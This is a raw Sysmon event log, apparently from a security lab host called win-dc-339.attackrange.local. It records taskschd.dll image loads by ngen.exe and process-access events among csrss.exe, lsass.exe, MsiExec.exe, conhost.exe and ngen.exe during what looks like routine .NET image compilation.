2\ntdll.dll+51781 734700x800000000000000074086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.749{A7A01FEF-EBD2-607E-540C-00000000BB01}1580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.733{A7A01FEF-EBD2-607E-550C-00000000BB01}48161772C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-540C-00000000BB01}1580c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.718{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-550C-00000000BB01}4816C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.718{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-540C-00000000BB01}1580c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.718{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-540C-00000000BB01}1580c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.702{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-520C-00000000BB01}5196c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.702{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-520C-00000000BB01}5196c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.702{A7A01FEF-EBD2-607E-520C-00000000BB01}5196C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.686{A7A01FEF-EBD2-607E-530C-00000000BB01}40402364C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-520C-00000000BB01}5196c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.671{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-530C-00000000BB01}4040C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.671{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-520C-00000000BB01}5196c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.671{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-520C-00000000BB01}5196c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.655{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-500C-00000000BB01}6892c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.655{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-500C-00000000BB01}6892c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.655{A7A01FEF-EBD2-607E-500C-00000000BB01}6892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.639{A7A01FEF-EBD2-607E-510C-00000000BB01}53325080C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-500C-00000000BB01}6892c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.639{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-510C-00000000BB01}5332C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.624{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-500C-00000000BB01}6892c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.624{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-500C-00000000BB01}6892c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.624{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-4E0C-00000000BB01}5392c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.624{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-4E0C-00000000BB01}5392c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.624{A7A01FEF-EBD2-607E-4E0C-00000000BB01}5392C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.593{A7A01FEF-EBD2-607E-4F0C-00000000BB01}47766496C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-4E0C-00000000BB01}5392c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.593{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-4F0C-00000000BB01}4776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.593{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-4E0C-00000000BB01}5392c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.577{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-4E0C-00000000BB01}5392c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.577{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-4C0C-00000000BB01}2124c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.577{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-4C0C-00000000BB01}2124c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.577{A7A01FEF-EBD2-607E-4C0C-00000000BB01}2124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.561{A7A01FEF-EBD2-607E-4D0C-00000000BB01}25083460C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-4C0C-00000000BB01}2124c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.546{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-4D0C-00000000BB01}2508C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.546{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-4C0C-00000000BB01}2124c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.546{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-4C0C-00000000BB01}2124c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 